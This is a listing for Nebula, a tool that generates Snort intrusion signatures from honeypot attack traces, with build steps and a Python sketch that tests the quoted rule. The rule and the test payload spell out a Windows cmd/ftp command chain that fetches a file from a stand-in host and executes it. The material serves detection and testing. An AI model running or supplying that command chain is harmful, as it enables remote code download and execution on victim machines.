Nebula

Nebula is a fully automated intrusion signature generator.

Nebula Ranking & Summary

  • License: GPL
  • Price: FREE
  • Publisher Name: Tillmann Werner
  • Publisher web site: http://nebula.mwcollect.org/

Nebula Description

Nebula is a fully automated intrusion signature generator. It can help secure a network by automatically calculating filter rules from attack traces. In a common setup nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in snort format.

The code was written to be fast. A signature isn't of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds. As more attacks of a kind are submitted, signatures get better and nebula will publish updated revisions.

The signature below was generated by nebula for FTP downloads during multi-stage attacks.

    alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; content: "cmd /"; offset: 0; depth: 5; content: " echo open "; distance: 1; within: 17; content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107; sid: 2000001; rev: 1;)

Nebula successfully generated signatures for input from honeytrap and argos. Feeding it with input from other sources shouldn't be very difficult, though. The code archive contains a command line client which submits data from files to a nebula server. Its code can also be taken as a reference implementation for the client side part of nebula's submission protocol.

Compiling nebula

Installing nebula is easy. Just follow the instructions on this page. First download the latest release from sourceforge:

    wget

Unpack the archive and change into the extracted directory:

    tar xjf nebula-0.2.2.tar.bz2 && cd nebula-0.2.2

Run the configure script to create a setup for your platform. If you want to install nebula in a specific location, use the --prefix switch as in the example below:

    ./configure --prefix=/opt/nebula

To finally build and install nebula, type:

    make && sudo make install

This installs the commands nebula and nebulaclient in /opt/nebula/bin/ (or the location you chose when invoking configure). Now check your setup by running nebula:

    $ /opt/nebula/bin/nebula
    Nebula 0.2.2
    Copyright (C) 2007-2008 Tillmann Werner
    Warning - No submission secret given.
    Ready.

If you see the output above, the installation was successful. To eliminate the warning, use the command line switch -s to define a secret used for submissions. Nebula can be stopped at any time by hitting Ctrl+C.

What's New in This Release:

  • An entropy threshold bug was corrected.
  • Realtime signal thread control is enabled only if it is available.
  • BSD compatibility changes were made.
  • The default host and port in nebulaclient were fixed.
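To see how the chained content options in the signature quoted above constrain a match, the following Python sketch parses that rule and evaluates it against constructed payloads. It is an added example, not code from nebula or from the original description, and it assumes a simplified model of Snort 2 modifiers: offset/depth bound the search from the payload start, distance/within define a window measured from the end of the previous match. The names parse_contents, matches, HIT and MISS are hypothetical.

```python
import re

# Added example (simplified Snort 2 content semantics, an assumption).
# RULE is the signature exactly as quoted in the description above.
RULE = (
    'alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; '
    'content: "cmd /"; offset: 0; depth: 5; '
    'content: " echo open "; distance: 1; within: 17; '
    'content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; '
    'content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; '
    'distance: 2; within: 107; sid: 2000001; rev: 1;)'
)

def parse_contents(rule):
    """Return the rule's content patterns, each with its positional modifiers."""
    body = rule[rule.index("(") + 1 : rule.rindex(")")]
    chain = []
    for key, quoted, bare in re.findall(r'(\w+):\s*(?:"([^"]*)"|([^;]*));', body):
        if key == "content":
            chain.append({"pat": quoted.encode()})
        elif key in ("offset", "depth", "distance", "within") and chain:
            chain[-1][key] = int(bare)
    return chain

def matches(chain, payload, i=0, prev_end=0):
    """Evaluate the content chain; retries later candidates if the rest fails."""
    if i == len(chain):
        return True
    c = chain[i]
    if "distance" in c or "within" in c:   # window relative to previous match end
        start = prev_end + c.get("distance", 0)
        end = start + c["within"] if "within" in c else len(payload)
    else:                                   # window from start of payload
        start = c.get("offset", 0)
        end = start + c["depth"] if "depth" in c else len(payload)
    end = min(end, len(payload))            # the whole pattern must fit in the window
    pos = payload.find(c["pat"], start, end)
    while pos != -1:
        if matches(chain, payload, i + 1, pos + len(c["pat"])):
            return True
        pos = payload.find(c["pat"], pos + 1, end)
    return False

CHAIN = parse_contents(RULE)
# Constructed test payloads (192.0.2.10 is a documentation address).
HIT = (b"cmd /c echo open 192.0.2.10 21 >> ii &echo user 1 1 >> ii &echo get "
       b"sample.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &sample.exe")
MISS = b"USER anonymous\r\nPASS guest\r\nRETR readme.txt\r\n"
print("HIT:", matches(CHAIN, HIT), "MISS:", matches(CHAIN, MISS))
```

Running a generated rule against known-good and known-benign captures in this way is a quick regression check before a new revision is deployed to a sensor.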

